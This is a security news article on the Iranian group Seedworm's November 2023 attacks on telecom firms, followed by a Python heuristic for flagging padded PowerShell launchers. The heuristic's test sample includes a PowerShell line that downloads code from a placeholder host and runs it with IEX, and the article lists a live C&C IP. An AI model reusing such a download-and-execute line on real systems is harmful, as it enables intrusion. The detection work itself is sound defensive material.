Telecommunications companies in Egypt, Sudan, and Tanzania have been targeted by the Iranian espionage group Seedworm, also known as MuddyWater.
The attacks took place in November 2023, and the attackers used a range of tools, including the MuddyC2Go infrastructure recently discovered and documented by Deep Instinct.
Alongside other publicly available and living-off-the-land tools, the attackers also used a custom keylogging tool, the SimpleHelp remote access tool, and Venom Proxy, all of which have been linked to Seedworm activity in the past.
MuddyC2Go Framework and Custom Keylogger Used
The attacks in this campaign, which targeted one specific telecom company, took place in November 2023. The initial indications of malicious behavior were certain PowerShell executions connected to the MuddyC2Go backdoor.
According to Symantec’s Threat Hunter Team, to establish a connection with its command-and-control (C&C) server, the MuddyC2Go launcher executed the following PowerShell code:
The variables declared at the start of the code are unused and irrelevant to its function; they appear to be there merely to evade detection by security software.
Immediately after this execution, the attackers used a previously established scheduled task to launch the MuddyC2Go malware. They also ran several commands typical of the Impacket WMIExec hacking tool.
Utilizing the SimpleHelp remote access tool, a connection was made to the C&C server at 146.70.124[.]102.
Additional PowerShell stager execution took place concurrently with the attacker running the Revsocks tool.
On the same computer as Revsocks and SimpleHelp, the attackers also used AnyDesk, a second legitimate remote access application. MuddyC2Go-related PowerShell executions also took place on the same system.
It is speculated that the attackers utilized WMI to initiate the SimpleHelp installer on the victim network earlier in 2023. Although this behavior could not be linked to Seedworm at the time, it seems that the same group of attackers was responsible for the earlier activity.
In another incident, the attackers additionally employed a new custom keylogger, and they also executed a customized build of the Venom Proxy hack tool on this network.
For persistence on victim machines, this activity uses SimpleHelp, a legitimate remote device control and administration application.
Venom Proxy is an open-source program described as “a multi-hop proxy tool developed for penetration testers.” It is written in Go and can be used to manage intranet nodes and to proxy network traffic into a multi-layer intranet with ease.
Other tools used in this activity include Revsocks, AnyDesk, PowerShell, and a custom keylogger.
“The full capabilities of MuddyC2Go are not yet known, but the executable contains an embedded PowerShell script that automatically connects to Seedworm’s C&C server, which eliminates the need for manual execution by an operator and gives the attackers remote access to a victim machine,” researchers said.
This emphasizes how important it is for businesses to be alert to any unusual PowerShell usage on their networks.
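As an added example, not code from the article or from Symantec, the following Python heuristic illustrates one way a defender can act on the two points above: the launcher's padding with unused variables, and the advice to watch for unusual PowerShell usage. It scans PowerShell script block text (as captured by script block logging) and flags blocks in which most assigned variables are never read again. The script blocks, the URL and the thresholds are constructed for the demonstration; the real MuddyC2Go launcher is not reproduced in the article.

```python
import re
from dataclasses import dataclass

# Constructed sample PowerShell script blocks, as a defender would see them in
# script block logging (Event ID 4104). They are NOT the MuddyC2Go launcher
# itself, which the article does not reproduce. The first imitates the padding
# pattern described: variables assigned up front that nothing later reads.
SAMPLE_SCRIPT_BLOCKS = {
    "padded-launcher": r"""
$fqz = 'ltm5'; $qwe = 9921; $zkd = 'orb'; $pau = 44; $rte = 'xx';
$u = 'http://c2.example.invalid/p'   # placeholder, not a real indicator
$r = (New-Object Net.WebClient).DownloadString($u); IEX $r
""",
    "admin-script": r"""
$svc = Get-Service -Name Spooler
$log = "C:\Temp\spooler.log"
if ($svc.Status -ne 'Running') { Start-Service $svc; Add-Content $log "restarted" }
""",
}

ASSIGN_RE = re.compile(r"\$(\w+)\s*=")   # $name = ...
USE_RE = re.compile(r"\$(\w+)")          # any $name occurrence

@dataclass
class Verdict:
    declared: int
    unused: int
    suspicious: bool

def analyse_script_block(text, max_unused_ratio=0.5, min_declared=4):
    """Flag a script block in which most assigned variables are never read.

    Heuristic only: a variable assigned twice and never read still counts as
    'used', and references via ${name} or Get-Variable are not recognised.
    """
    declared = set(ASSIGN_RE.findall(text))
    counts = {}
    for name in USE_RE.findall(text):
        counts[name] = counts.get(name, 0) + 1
    # The assignment itself is one occurrence; anything beyond that is a read.
    unused = [n for n in declared if counts.get(n, 0) <= 1]
    ratio = len(unused) / len(declared) if declared else 0.0
    suspicious = len(declared) >= min_declared and ratio > max_unused_ratio
    return Verdict(len(declared), len(unused), suspicious)

def flagged_blocks(blocks):
    """Return the names of script blocks the heuristic marks for review."""
    return [name for name, text in blocks.items() if analyse_script_block(text).suspicious]

if __name__ == "__main__":
    for name, text in SAMPLE_SCRIPT_BLOCKS.items():
        print(name, analyse_script_block(text))
```

The thresholds are deliberately coarse; in practice this check is a triage signal to combine with the other indicators the article lists (scheduled tasks, WMIExec-style commands, remote access tools), not a verdict on its own.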